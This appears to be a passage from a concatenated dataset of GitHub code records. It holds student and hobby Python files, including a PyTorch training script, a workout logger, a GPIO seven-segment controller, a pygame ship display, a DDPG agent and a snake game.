xTrain = xTrain.to(device) \n yTrain = yTrain.to(device)\n \n def closure():\n optimizer.zero_grad()\n output = model(xTrain)\n loss = loss_func(output, yTrain)\n loss.backward()\n return loss\n \n for epoch in range(200): # loop over the dataset multiple times\n prediction = model(xTrain) # input x and predict based on x\n\n #loss = loss_func(prediction, yTrain) # must be (1. nn output, 2. target)\n\n #optimizer.zero_grad() # clear gradients for next train\n #loss.backward() # backpropagation, compute gradients\n loss = optimizer.step(closure) # apply gradients\n\n # print statistics\n running_loss = loss.item()\n print('[%d] loss: %.7f' %(epoch + 1,running_loss))\n\n print('Finished Training')\n\t\n torch.save(model.state_dict(),'model%s.pth' %(Arch))\n\nnet = Net(n_feature=np.shape(x)[1], n_hidden=hlayers, n_output=np.shape(ati)[1])\nnet = net.double()\nnet.load_state_dict(torch.load('model%s.pth' %(Arch)))\npred = net(Variable(torch.from_numpy(x)))\npred = pred.detach().numpy()\npred = pred*max_ati\n\nfig, axs = plt.subplots(3, 2)\naxs[0, 0].plot(ati[:,0])\naxs[0, 0].plot(pred[:,0])\n\naxs[1, 0].plot(ati[:,1])\naxs[1, 0].plot(pred[:,1])\n\naxs[2, 0].plot(ati[:,2])\naxs[2, 0].plot(pred[:,2])\n\naxs[0, 1].plot(ati[:,3])\naxs[0, 1].plot(pred[:,3])\n\naxs[1, 1].plot(ati[:,4])\naxs[1, 1].plot(pred[:,4])\n\naxs[2, 1].plot(ati[:,5])\naxs[2, 1].plot(pred[:,5])\nplt.show()\n","repo_name":"amirhadi3/dVRK-compliantTrocar","sub_path":"NN.py","file_name":"NN.py","file_ext":"py","file_size_in_byte":5148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"21178697391","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\nb = 1.95\nr = 1\nmass = 1.9\ng = 4\nSF = 1.5\n\nA = [[(b**3)/12,b],[(b**2)/4,(1-r)]]\nB = [mass*g*SF,0]\na,c = np.linalg.solve(A,B)\n\n\nxs = np.linspace(-b/2,b/2,1000)\n\nplt.figure()\nplt.grid()\nplt.ylim([0,c*1.2])\nplt.plot(xs, a*xs**2 + c)\nplt.show()","repo_name":"Lanzebe/P02-TuksProjects","sub_path":"Y4-MLV420/SparDesign/TestWingDist.py","file_name":"TestWingDist.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"1528801527","text":"import os\nimport csv\nimport constants\nfrom getsaveddata import get_last_log_date\nfrom menufunctions import quit_function, clear_screen\nfrom currentstreaks import CurrentStreaksAlert\n\n\nclass Workout:\n def __init__(self, log, date, workout_dict, confirmation):\n self.log = log\n self.workout_dict = workout_dict\n self.date = date\n self.confirmation = confirmation\n\n def check_for_todays_workout(self):\n # Open log file and check if there is an existing workout for today\n last_log = get_last_log_date()\n if self.date == last_log:\n return True\n else:\n return False\n\n def get_workout_from_user(self):\n if not self.check_for_todays_workout():\n while True:\n user_input = input(\"Now editing today's workout.\\nEnter an exercise followed by a number \"\n \"(reps or duration) e.g. 'push-up 20'. Type 'f' when finished: \")\n if user_input.lower() == \"q\":\n quit_function() \n elif user_input.lower() == \"f\":\n break\n else:\n # Separate number from exercise name\n number = user_input.split()[-1]\n # Remove number and extra space from end of exercise name\n exercise_name = user_input[:-(len(number) + 1)]\n if exercise_name not in constants.EXERCISE_LIST:\n print(\"Error: Enter a valid exercise type and a number.\")\n elif not number.isnumeric():\n print(\"Error: Exercise reps or duration must be numeric.\")\n else:\n self.workout_dict[exercise_name] = number\n else:\n print(\"Error: You have already logged a workout for today.\")\n return\n\n def show_workout(self):\n clear_screen()\n for key, value in self.workout_dict.items():\n print(key, value)\n\n def edit_workout(self):\n self.show_workout()\n self.get_workout_from_user()\n\n def confirm_workout(self):\n if self.workout_dict == {}:\n return\n else:\n while True:\n self.show_workout()\n user_input = input(\"Log this workout? 'Y' for 'yes', 'e' for 'edit' or 'c' for cancel. \")\n if user_input.lower() == \"q\":\n quit_function()\n elif user_input.lower() == \"c\":\n return\n elif user_input.lower() == \"y\":\n self.confirmation = True\n return\n elif user_input.lower() == \"e\":\n self.edit_workout()\n else:\n continue\n\n def write_workout_to_csv(self):\n if self.confirmation == True:\n write_to_csv_dict = {\"date\": self.date}\n # Create comprehensive dictionary with every exercise in exercise list\n for exercise in constants.EXERCISE_LIST:\n write_to_csv_dict[exercise] = 0\n # Copy today's workout into comprehensive dictionary\n for key in self.workout_dict:\n write_to_csv_dict[key] = self.workout_dict[key]\n with open(self.log, \"a\") as log:\n writer = csv.writer(log)\n writer.writerow(write_to_csv_dict.values())\n\n def streak_alert(self):\n if self.confirmation == True:\n streak_alert = CurrentStreaksAlert(list(self.workout_dict.keys()))\n streak_alert.current_streaks_alert()\n\n def get(self):\n self.get_workout_from_user()\n self.confirm_workout()\n self.write_workout_to_csv()\n self.streak_alert()","repo_name":"plutoniumcat/DailyExercise","sub_path":"workout.py","file_name":"workout.py","file_ext":"py","file_size_in_byte":3760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"18527549063","text":"'''\n092 - Crie um programa que leia nome, ano de nascimento e carteira de trabalho e\ncadastre-os (com idade) em um dicionario, se por acaso a CTPS for diferente de ZERO,\no dicionario recebera tambem o ano de contratação e o salario. Calcule e acrescente,\nalem da idade, com quantos anos a pessoa vai se aposentar.\n'''\nfrom datetime import datetime\ndados = dict()\ndados['Nome'] = str(input('Nome: ')).strip().title()\nnasc = int(input('Ano de Nascimento: '))\ndados['Idade'] = datetime.now().year - nasc\ndados['CTPS'] = int(input('Carteira de Trabalho (0 não tem): '))\nif dados['CTPS'] != 0:\n dados['Contratação'] = int(input('Ano de Contratação: '))\n dados['Salario'] = float(input('Salario: '))\n #anos_trabalhados = 35 - (datetime.now().year - dados['Contratação'])\n dados['Aposentadoria'] = dados['Idade'] + (35 - (datetime.now().year - dados['Contratação']))\nprint('-=' * 15)\nfor k, c in dados.items():\n print(f'{k} tem o valor {c}')\n\n\n\n\n\n","repo_name":"mariocarvalho-2205/python","sub_path":"092 nome ano nasc carteira de trabalho.py","file_name":"092 nome ano nasc carteira de trabalho.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"19468277029","text":"# def type_int(int_number):\n# return int_number * 2\n#\n#\n# def type_float(float_number):\n# result = float_number * 1.5\n# return f\"{result:.2f}\"\n#\n#\n# def type_string(string):\n# return \"$\" + string + \"$\"\n#\n#\n# data_type = input()\n# value = input()\n#\n# if data_type == \"int\":\n# value = int(value)\n# print(type_int(value))\n# elif data_type == \"real\":\n# value = float(value)\n# print(type_float(value))\n# elif data_type == \"string\":\n# print(type_string(value))\n\n\ndef calculations(data_type, value):\n if data_type == \"int\":\n value = int(value)\n return value * 2\n\n if data_type == \"real\":\n value = float(value)\n return f\"{value * 1.5:.2f}\"\n\n if data_type == \"string\":\n return \"$\" + value + \"$\"\n\n\ninput_data_type = input()\ninput_value = input()\n\nprint(calculations(input_data_type, input_value))\n","repo_name":"azashev/Programming-Fundamentals-with-Python-Softuni","sub_path":"Functions/data_types.py","file_name":"data_types.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"74901355749","text":"from gpiozero import LED\n\n\"\"\"\n =0=\n| |\n1 2\n| |\n =3=\n| |\n4 5\n| |\n =6=\n\"\"\"\n\nMAP_VAL = {\n 0: [0, 1, 2, 4, 5, 6],\n 1: [2, 5],\n 2: [0, 2, 3, 4, 6],\n 3: [0, 2, 3, 5, 6],\n 4: [1, 2, 3, 5],\n 5: [0, 1, 3, 5, 6],\n 6: [0, 1, 3, 4, 5, 6],\n 7: [0, 2, 5],\n 8: [0, 1, 2, 3, 4, 5, 6],\n 9: [0, 1, 2, 3, 5, 6]\n}\nMAP_ADDR = {\n 0: 16,\n 1: 20,\n 2: 21,\n 3: 6,\n 4: 13,\n 5: 19,\n 6: 26,\n}\n\n\nclass DigitOutputController:\n debug = False\n\n def __init__(self, masks=MAP_VAL, addresses=MAP_ADDR, debug=False):\n if debug:\n self.debug = True\n return\n\n self._leds = [LED(i) for i in addresses.values()]\n self._masks = masks\n\n def show(self, digit=0):\n if self.debug:\n print(digit)\n return\n\n vals = self._masks.get(digit, [])\n\n for i, led in enumerate(self._leds):\n led.value = i in vals\n","repo_name":"BANOnotIT/voice-ziferblat","sub_path":"core/digit_controller.py","file_name":"digit_controller.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"33109716351","text":"import math\r\nimport pygame as pg\r\n\r\nWHITE = (255, 255, 255)\r\nBACKGND = (0, 0, 0)\r\nLAWNGREEN = (0, 223, 0)\r\nSARGA = (230, 230, 40)\r\nBARNA = (200, 135, 80)\r\nBORDO = (100, 0, 0)\r\n\r\nclass HajoObject:\r\n #hajo meretek, [m]\r\n length = 13.64\r\n width = 4.1\r\n #hajo pozicioja, [m, rad]\r\n position = pg.math.Vector2(0.0,0.0)\r\n rotation = 0.0\r\n #hajo sebessege [m/s, rad/s]\r\n speed = pg.math.Vector2(0,0)\r\n speed2 = pg.math.Vector2(0,0)\r\n speed3 = pg.math.Vector2(0,0)\r\n szogseb = 0.0\r\n #relativ pozicio a megjeleniteshez\r\n midscreen = pg.math.Vector2(0,0)\r\n #hajo pontjai, [m]. Ezt atalakitjuk vektorokka a konstrutorban, azt lehet hasznalni\r\n# hajoPoly = [(0, 6.82), (-1.35, 5.42), (-2.05, 0), (-2.05, -6.82), (2.05, -6.82), (2.05, 0), (1.35, 5.42)]\r\n hajoPoly = [(0.5, 0), (0.4, -0.1), (0, -0.15), (-0.5, -0.15), (-0.5, 0.15), (0, 0.15), (0.4, 0.1)]\r\n hajoOffset = 0.0 #ennyivel elorebb tolja a hajo korvonalat a centerhez kepest, csak a megjeleniteshez, hogy szep legyen a fordulas\r\n #elozo kirajzolt polygon a torleshez\r\n lastPoly = [(0,0), (0,0), (0,0)]\r\n speedVect = [pg.math.Vector2(0,0), pg.math.Vector2(0,0)] #ez a zold sebesseg\r\n speedVect2 = [pg.math.Vector2(0,0), pg.math.Vector2(0,0)] #ez meg a sarga / INS\r\n speedVect3 = [pg.math.Vector2(0,0), pg.math.Vector2(0,0)] #ez meg a barna / GPS\r\n thrustVects = [[]] * 5 # a hajo koordinatarendszereben az aktuatorok vektorai\r\n #lastThVec = [ [(0,0), (0,0)] ] * 5\r\n Thrust = [0] * 4\r\n thrustVects = [[]]*5 # a hajo koordinatarendszereben az aktuatorok vektorai\r\n lastThVec = [ \r\n [(0,0), (0,0)],\r\n [(0,0), (0,0)],\r\n [(0,0), (0,0)],\r\n [(0,0), (0,0)],\r\n [(0,0), (0,0)]\r\n ]\r\n U12V = 0.0\r\n Uact = [0.0]*4\r\n Iact = [0.0]*4\r\n count = 0 #ez csak egy szam, a modellnel a packet counter erteke, hogy lassuk a mukodest\r\n\r\n def __init__(self, scr, dict) -> None:\r\n self.screen = scr\r\n self.ship_scale = dict[\"length\"]\r\n self.scr_scale = dict[\"zoom\"]\r\n self.hajoOffset = dict['offset']\r\n self.midscreen = pg.math.Vector2(scr.get_width() / 2, scr.get_height() / 2)\r\n # a hajo formaja, felskalazva, offsetelve, de zoomolas elott\r\n self.hajoVect = list(map(lambda x: pg.math.Vector2(x)*self.ship_scale+(self.hajoOffset, 0), self.hajoPoly))\r\n self.font = pg.font.Font(None, 24)\r\n #meghajtas kijelzeshez vektorok\r\n self.thrustVects[0] = [(dict['orrL'], 0), (0, -1)] #orrsugar helye, iranya\r\n self.thrustVects[1] = [(-dict['farL'], 0), (0, -1)] #farsugar helye, iranya\r\n self.thrustVects[2] = [(self.hajoVect[3][0], dict['motL']/-2), (-1, 0)] #jobb motor \r\n self.thrustVects[3] = [(self.hajoVect[3][0], dict['motL']/2), (-1, 0)] #bal motor helye\r\n self.thrustVects[4] = [(self.hajoVect[0][0], 0), (0, 1)] #forgas vektor helye, iranya\r\n\r\n def doSpeedVec(self, V):\r\n result = [0,0]\r\n speedVect = V.rotate_rad(self.rotation)\r\n result[0] = self.position*self.scr_scale\r\n result[1] = (self.position+speedVect)*self.scr_scale\r\n # flippelni kell lefele, es betenni a kepernyo kozepere\r\n result = list(map(lambda x: (x.x + self.midscreen.x, self.midscreen.y - x.y), result))\r\n return result\r\n\r\n def draw(self, color=WHITE):\r\n #elozo torlese\r\n pg.draw.polygon(self.screen, BACKGND, self.lastPoly)\r\n pg.draw.line(self.screen, BACKGND, self.speedVect[0], self.speedVect[1], width = 3)\r\n pg.draw.line(self.screen, BACKGND, self.speedVect2[0], self.speedVect2[1], width = 3)\r\n pg.draw.line(self.screen, BACKGND, self.speedVect3[0], self.speedVect3[1], width = 3)\r\n for x in range(5):\r\n pg.draw.line(self.screen, BACKGND, self.lastThVec[x][0], self.lastThVec[x][1], width = 3)\r\n # uj vektorok szamitasa\r\n #vektor talppontja\r\n tol = (pg.math.Vector2(self.thrustVects[x][0]).rotate_rad(self.rotation) + self.position)*self.scr_scale\r\n if(x < 4):\r\n temp = self.Thrust[x]\r\n else:\r\n temp = self.szogseb * 5\r\n ig = tol + (pg.math.Vector2(self.thrustVects[x][1]).rotate_rad(self.rotation)) * self.scr_scale*temp*self.ship_scale/5\r\n #flippelni, kozepre tenni\r\n self.lastThVec[x][0] = (tol.x + self.midscreen.x, self.midscreen.y - tol.y)\r\n self.lastThVec[x][1] = (ig.x + self.midscreen.x, self.midscreen.y - ig.y)\r\n\r\n #uj pozicio szamitasa\r\n #forgatas, poziciora mozgatas, aztan skalazas(zoom):\r\n shipmap = map(lambda x: (x.rotate_rad(self.rotation) + self.position) * self.scr_scale, self.hajoVect)\r\n\r\n # flippelni kell lefele, es betenni a kepernyo kozepere\r\n self.lastPoly = list(map(lambda x: (x.x + self.midscreen.x, self.midscreen.y - x.y), shipmap))\r\n # uj sebesseg vektorok eloallitasa\r\n self.speedVect = self.doSpeedVec(self.speed)\r\n self.speedVect2 = self.doSpeedVec(self.speed2)\r\n self.speedVect3 = self.doSpeedVec(self.speed3)\r\n # uj rajzolas\r\n pg.draw.polygon(self.screen, color, self.lastPoly)\r\n pg.draw.line(self.screen, LAWNGREEN, self.speedVect[0], self.speedVect[1], width = 3)\r\n pg.draw.line(self.screen, SARGA, self.speedVect2[0], self.speedVect2[1], width = 3)\r\n pg.draw.line(self.screen, BARNA, self.speedVect3[0], self.speedVect3[1], width = 3)\r\n for x in self.lastThVec:\r\n pg.draw.line(self.screen, BORDO, x[0], x[1], width = 3)\r\n pg.draw.line(self.screen, LAWNGREEN, self.lastThVec[4][0], self.lastThVec[4][1], width = 3)\r\n # texts\r\n # speed, ez a valos sebesseg vagy az INS sebesseg\r\n text = self.font.render(\"Speed / GPS\", True, LAWNGREEN, BACKGND)\r\n yy = 10\r\n self.screen.blit(text, (10,yy))\r\n for i in range(2):\r\n text = self.font.render(f\"V{i}: {self.speed[i]:3.2f} [m/s], \", True, WHITE, BACKGND)\r\n self.screen.blit(text, (150+i*130,yy))\r\n # speed2, ez a modell sebesseg\r\n text = self.font.render(\"INS sebesseg\", True, SARGA, BACKGND)\r\n yy = 35\r\n self.screen.blit(text, (10,yy))\r\n for i in range(2):\r\n text = self.font.render(f\"V{i}: {self.speed2[i]:3.2f} [m/s], \", True, WHITE, BACKGND)\r\n self.screen.blit(text, (150+i*130,yy))\r\n # speed3, ez a GPS sebesseg\r\n text = self.font.render(\"Modell sebesseg\", True, BARNA, BACKGND)\r\n yy = 60\r\n self.screen.blit(text, (10,yy))\r\n for i in range(2):\r\n text = self.font.render(f\"V{i}: {self.speed3[i]:3.2f} [m/s], \", True, WHITE, BACKGND)\r\n self.screen.blit(text, (150+i*130,yy))\r\n # Uact, aktuator feszultsegek\r\n text = self.font.render(f\"U12: {self.U12V:2.2f} [V]\", True, WHITE, BACKGND)\r\n self.screen.blit(text, (500,10))\r\n text = self.font.render(f\"Packet cnt: {self.count}\", True, WHITE, BACKGND)\r\n self.screen.blit(text, (480,35))\r\n yy = 85\r\n text = self.font.render(\"Orrsugar ---------- Farsugar ---------- Jobb mot. --------- Bal mot.\", True, WHITE, BACKGND)\r\n self.screen.blit(text, (150,yy))\r\n text = self.font.render(\"Feszultsegek\", True, WHITE, BACKGND)\r\n yy = 110\r\n self.screen.blit(text, (10,yy))\r\n for i in range(4):\r\n text = self.font.render(f\"{self.Uact[i]:3.2f} [V], \", True, WHITE, BACKGND)\r\n self.screen.blit(text, (150+i*130,yy))\r\n\r\n text = self.font.render(\"Áramok\", True, WHITE, BACKGND)\r\n yy = 135\r\n self.screen.blit(text, (10,yy))\r\n for i in range(4):\r\n text = self.font.render(f\"{self.Iact[i]:3.2f} [A], \", True, WHITE, BACKGND)\r\n self.screen.blit(text, (150+i*130,yy))\r\n\r\n # sebesseg megadasa, sajat koordinatarendszerbe. Ez csak a kiirashoz kell\r\n def setspeed(self, V):\r\n self.speed = pg.math.Vector2(V[0], V[1])\r\n self.szogseb = V[2]\r\n\r\n # a masik ket sebesseg vektor megadasa\r\n def setSpeeds(self, V2, V3):\r\n self.speed2 = pg.math.Vector2(V2[0], V2[1])\r\n self.speed3 = pg.math.Vector2(V3[0], V3[1])\r\n\r\n # pozicio, fix kordinatarenszerben\r\n def setPosition(self, X):\r\n self.position.x = X[0]\r\n self.position.y = X[1]\r\n self.rotation = X[2]\r\n\r\n # aktuator erok, sajat kordinatarenszerben\r\n def setThrust(self, T):\r\n self.Thrust = T\r\n\r\n # ez kozeppre teszi a hajot\r\n def resetPos(self):\r\n X = self.position*self.scr_scale\r\n self.midscreen = (self.screen.get_width() / 2, self.screen.get_height() / 2) - pg.math.Vector2(X.x, -X.y)\r\n\r\n","repo_name":"eendsze/ssiresdsk","sub_path":"hajomegjelenito.py","file_name":"hajomegjelenito.py","file_ext":"py","file_size_in_byte":8667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"6912349734","text":"class cond_tree_node:\n data = None\n node_type = None # ATTRIBUTE, INTEGER, REL_OP, LOGIC_OP\n left = None\n right = None\n\n def __init__(self, data, node_type, left=None, right=None):\n self.data = data\n self.node_type = node_type\n self.left = left\n self.right = right\n\n \n def __str__(self):\n result = \"\"\n if self.left:\n result += \"(\" + self.left.__str__()\n if self.data:\n result += \"\" + self.data + \"\"\n if self.right:\n result += self.right.__str__() + \")\"\n\n return result\n\n \n def __add__(self, other):\n return str(self) + other\n\n \n def __radd__(self, other):\n return other + str(self)\n\n \n def get_all_atts_in_cond(self):\n if (self.left is None and self.right is None): # is leaf\n if (self.node_type == \"ATTRIBUTE\"):\n return [self.data]\n else:\n return []\n\n return self.left.get_all_atts_in_cond() + self.right.get_all_atts_in_cond()\n\n\n def get_attribute_table(self):\n \"\"\"receives an attribute-node and returns R or S\"\"\" \n result = None \n if(self.node_type == \"ATTRIBUTE\"):\n result = (self.data[0]) \n \n return result\n\n \n def get_attribute_alone(self):\n \"\"\"receives an attribute-node and returns atribute alone\"\"\" \n result = None \n if(self.node_type == \"ATTRIBUTE\"):\n result = (self.data[2]) \n \n return result\n\n\n def are_different_tables(self):\n table1 = self.left.get_attribute_table()\n table2 = self.right.get_attribute_table()\n return (table1 != table2)\n\n \n def are_same_attributes(self):\n att1 = self.left.get_attribute_alone()\n att2 = self.right.get_attribute_alone()\n return (att1==att2) ","repo_name":"OMRYZUTA/databases_2","sub_path":"conditionTree.py","file_name":"conditionTree.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"16350709509","text":"\"\"\"\n#내가 짜본 코드\n\nfrom random import randint\nimport time\nfrom datetime import datetime\n\n\n\ndef unique(x): #중복입력방지를 위한 함수\n for i in x:\n if(x.count(i)>=2):\n return False\n return True\n\nstart_time = time.time()\nbaseball = True\n\n\n\nwhile baseball:\n count = 0\n n = 0\n \n try: n=int(input(\"몇자리수인지 입력하시오.(1~10)\"))\n \n except ValueError:\n print(\"숫자를 입력하시오.\")\n break\n \n \n if n > 10 :\n print(\"1~10까지 정수만\")\n \n elif n <=10 :\n num=['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n guess = []\n for i in range(n):\n temp = randint(0, len(num)-1)\n guess.append(num[temp])\n print(guess)\n print(\"띄어쓰기 하지말고 0~9사이의 숫자들을 적으시오.\")\n \n baseball2 = True\n while baseball2:\n count+=1\n usr_guess = str(input(\"숫자를 맞혀보세요.\"))\n try: temp=int(usr_guess)\n \n except ValueError:\n if usr_guess == 'exit':\n baseball2 = False\n baseball = False\n \n if len(usr_guess) != n:\n print(n, \"자리 숫자입니다.\")\n \n elif not unique(usr_guess):\n print(\"\\n 중복은 안됩니다.\")\n \n elif True :\n strike = 0\n ball = 0\n out = 0\n for i in range(n):\n if usr_guess[i] == guess[i]:\n strike += 1\n elif usr_guess[i] in guess:\n ball += 1\n elif not usr_guess[i] in guess:\n out += 1\n if strike == n:\n end_time = time.time()\n print(f\"축하합니다. {count} 번 만에 정답입니다! 소요시간:{end_time-start_time:.2f}초 {datetime.now()}\")\n baseball2 = False\n baseball = False\n else:\n print(f\"\\n {strike} 스트라이크, {ball} 볼, {out} 아웃\")\n\"\"\"\n\n\n\n\"\"\"\n#다른 분이 짠 코드\n\nimport random\nimport time\nfrom datetime import datetime, timedelta\nprint(\"원하시는 자리 수를 입력하세요\")\nn = int(input())\nstart_time = time.time()\ndef baseball_number_generator(n):\n result = set()\n if n < 1:\n print(\"1이상의 값을 입력해주세요\")\n return False\n while len(result)计算梯度->反向传播\n self.actor_optimizer.zero_grad()\n actor_loss.backward()\n self.actor_optimizer.step()\n '''训练Critic'''\n # 利用r与s_计算出Q'(s_,a_),进而计算出Q(s,a)的target值\n a_target = self.actor_target(batch_s_)\n q_tmp = self.critic_target(batch_s_, a_target)\n q_target = batch_r + GAMMA * q_tmp\n # 计算Q(s,a)和loss\n q_eval = self.critic(batch_s, batch_a)\n td_error = self.loss_func(q_target, q_eval)\n self.critic_loss_list.append(td_error)\n # 更新critic的参数:梯度归零->计算梯度->反向传播\n self.critic_optimizer.zero_grad()\n td_error.backward()\n self.critic_optimizer.step()\n\n def save_model(self):\n torch.save(self.actor.state_dict(), 'actor_weights.pth')\n torch.save(self.critic.state_dict(), 'critic_weights.pth')\n\n\n# 配置gym\nenv = gym.make(ENV_NAME)\nenv = env.unwrapped\nenv.reset(seed=1)\ns_dim = env.observation_space.shape[0]\na_dim = env.action_space.shape[0] # 动作值为[a1,a2],a1控制油门,a2控制左右点火引擎,取值范围都为[-1,1]的实数\na_bound = env.action_space.high\na_low_bound = env.action_space.low\n\nddpg = DDPG(a_dim, s_dim, a_bound)\nvar = 3 # 加入噪声用到的正态分布中的标准差\nt1 = time.time()\nreward_list = []\nfor i in range(EPISODES):\n s = env.reset()\n ep_r = 0 # 每一个episode的累积奖励值\n for j in range(EP_STEPS):\n if RENDER: env.render()\n # 加入噪声\n a = ddpg.choose_action(s)\n a = np.clip(np.random.normal(a, var), a_low_bound, a_bound)\n s_, r, done, _, info = env.step(a)\n ddpg.store_experiences(s, a, r , s_) # 存储与环境互动经验\n if ddpg.pointer > MEMORY_CAPACITY:\n var *= 0.9999 # decay the exploration controller factor\n ddpg.learn()\n\n s = s_\n ep_r += r\n if j == EP_STEPS - 1:\n reward_list.append(ep_r)\n print('Episode: ', i, ' Reward: %i' % ep_r, 'Explore: %.2f' % var)\n\n if i > 0 and i % 50 == 0:\n ddpg.save_model()\n x = range(0, i + 1)\n plt.plot(x, reward_list, '.-')\n plt.xlabel(\"episode\")\n plt.ylabel(\"reward\")\n plt.show()\nprint('Running time: ', time.time() - t1)\n","repo_name":"Lwon2001/ReinforcementLearning","sub_path":"DDPG/ddpg.py","file_name":"ddpg.py","file_ext":"py","file_size_in_byte":7030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"10037338870","text":"import random\nimport pygame\nfrom pygame.locals import *\nimport sys\nfrom main_menu import Main_menu\nimport time\nfrom update_user import update_user\n\npygame.init()\n\nFramePerSec = pygame.time.Clock()\nclock = pygame.time.Clock()\n\nWIDTH = 599\nHEIGHT = 599\nRHEIGHT = 629\nBLOCK = int(30) # the size of every square\nLEVEL = 0\nSPEED = 10\nSCREEN = pygame.display.set_mode((WIDTH, RHEIGHT))\n\nsnake_color = (32, 32, 32)\nbackground_color = (33, 181, 250)\nf1_color = (82, 237, 65)\nf2_color = (82, 237, 65)\nf3_color = (82, 237, 65)\ntext_color = (255, 234, 0)\nhead_color = (255, 0, 0)\nborder_color = (128, 128, 128)\n\nscore_font = pygame.font.SysFont(\"Arial\", 15)\n\n\nclass Point:\n\tdef __init__(self, x, y):\n\t\tself.x = x\n\t\tself.y = y\n\n\nclass Snake:\n\tdef __init__(self, snake_pos):\n\t\tself.body = snake_pos\n\n\tdef draw(self):\n\t\t# draw body part\n\t\tfor body in self.body[1:]:\n\t\t\tpygame.draw.rect(\n\t\t\t\tSCREEN,\n\t\t\t\tsnake_color,\n\t\t\t\tpygame.Rect(\n\t\t\t\t\tbody.x * BLOCK,\n\t\t\t\t\tbody.y * BLOCK,\n\t\t\t\t\tBLOCK,\n\t\t\t\t\tBLOCK,\n\t\t\t\t)\n\t\t\t)\n\t\thead = self.body[0] # draw head\n\t\tpygame.draw.rect(\n\t\t\tSCREEN,\n\t\t\thead_color,\n\t\t\tpygame.Rect(\n\t\t\t\thead.x * BLOCK,\n\t\t\t\thead.y * BLOCK,\n\t\t\t\tBLOCK,\n\t\t\t\tBLOCK,\n\t\t\t)\n\t\t)\n\n\tdef move(self, dx, dy):\n\t\t# Move body\n\t\tfor idx in range(len(self.body) - 1, 0, -1):\n\t\t\tself.body[idx].x = self.body[idx - 1].x # position body[i] = body[i-1]\n\t\t\tself.body[idx].y = self.body[idx - 1].y\n\t\t# Move head\n\t\tself.body[0].x += dx\n\t\tself.body[0].y += dy\n\n\t\t# Check whether snake leaves the playing area\n\t\tif self.body[0].x > WIDTH // BLOCK:\n\t\t\tself.body[0].x = 0\n\t\telif self.body[0].x < 0:\n\t\t\tself.body[0].x = WIDTH // BLOCK\n\t\telif self.body[0].y < 0:\n\t\t\tself.body[0].y = WIDTH // BLOCK\n\t\telif self.body[0].y > HEIGHT // BLOCK:\n\t\t\tself.body[0].y = 0\n\n\tdef check_collision_food(self, food):\n\t\tif food.pos.x == self.body[0].x and food.pos.y == self.body[0].y:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef check_collision_border(self, borders):\n\t\tfor pos in borders:\n\t\t\tif pos.x == self.body[0].x and pos.y == self.body[0].y:\n\t\t\t\treturn True\n\n\t\treturn False\n\n\tdef check_collision_snake(self):\n\t\tfor pos in self.body[1:]:\n\t\t\tif self.body[0].x == pos.x and self.body[0].y == pos.y:\n\t\t\t\treturn True\n\t\treturn False\n\n\n\nclass Food:\n\tdef __init__(self):\n\t\tself.pos = None\n\t\tself.weight = None\n\t\tself.spawn_time = None\n\t\tself.color = None\n\n\tdef draw(self):\n\t\tif self.weight == 1:\n\t\t\tself.color = f1_color\n\t\telif self.weight == 2:\n\t\t\tself.color = f2_color\n\t\telif self.weight == 3:\n\t\t\tself.color = f3_color\n\n\t\tpygame.draw.rect(\n\t\t\tSCREEN,\n\t\t\tself.color,\n\t\t\tpygame.Rect(\n\t\t\t\tself.pos.x * BLOCK,\n\t\t\t\tself.pos.y * BLOCK,\n\t\t\t\tBLOCK,\n\t\t\t\tBLOCK,\n\t\t\t)\n\t\t)\n\n\tdef new_pos(self, snake_list, border_list):\n\t\twhile True:\n\t\t\tx, y = random.randint(0, WIDTH // BLOCK), random.randint(0, HEIGHT // BLOCK)\n\t\t\tpos = Point(x, y)\n\t\t\tif (pos not in border_list) and (pos not in snake_list):\n\t\t\t\treturn pos\n\n\tdef create_new(self, snake_list, border_list, cur_time):\n\t\tself.weight = random.randint(1, 3)\n\t\tself.pos = self.new_pos(snake_list, border_list)\n\t\tself.spawn_time = cur_time\n\nclass Border:\n\tdef __init__(self, lvl):\n\t\tself.lvl = lvl\n\t\tself.border_list = []\n\n\tdef load_border(self):\n\t\tpath = \"/Users/nurstanduisengaliyev/Documents/Python/pp2-22B031491/tsis10/SnakeGame/levels/\" + str(self.lvl) + \".txt\"\n\t\twith open(path, 'r') as f:\n\t\t\tborder_rows = f.readlines()\n\n\t\tfor i, line in enumerate(border_rows):\n\t\t\tfor j, value in enumerate(line):\n\t\t\t\tif value == '#':\n\t\t\t\t\tself.border_list.append(Point(j, i))\n\n\tdef draw(self):\n\t\tfor i in self.border_list:\n\t\t\tpygame.draw.rect(SCREEN, border_color, (i.x * BLOCK, i.y * BLOCK, BLOCK, BLOCK))\n\ndef get_string_body(body):\n\tstr1 = str(body[0].x) + \", \" + str(body[1].y)\n\tfor pos in body[1:]:\n\t\t# \"x, y; x2, y2; x3, y3\n\t\tstr1 += \"; \" + str(pos.x) + ', ' + str(pos.y)\n\treturn str1\n\ndef draw_text(score, lvl):\n\ttxt_sur1 = score_font.render(f\"Score = {score}\", True, (0, 0, 0))\n\ttxt_sur2 = score_font.render(f\"Level = {lvl}\", True, (0, 0, 0))\n\tSCREEN.blit(txt_sur1, (15, (HEIGHT // BLOCK + 1) * BLOCK + 5))\n\tSCREEN.blit(txt_sur2, (WIDTH - 100, (HEIGHT // BLOCK + 1) * BLOCK + 5))\n\ndef runGame(username, lvl, 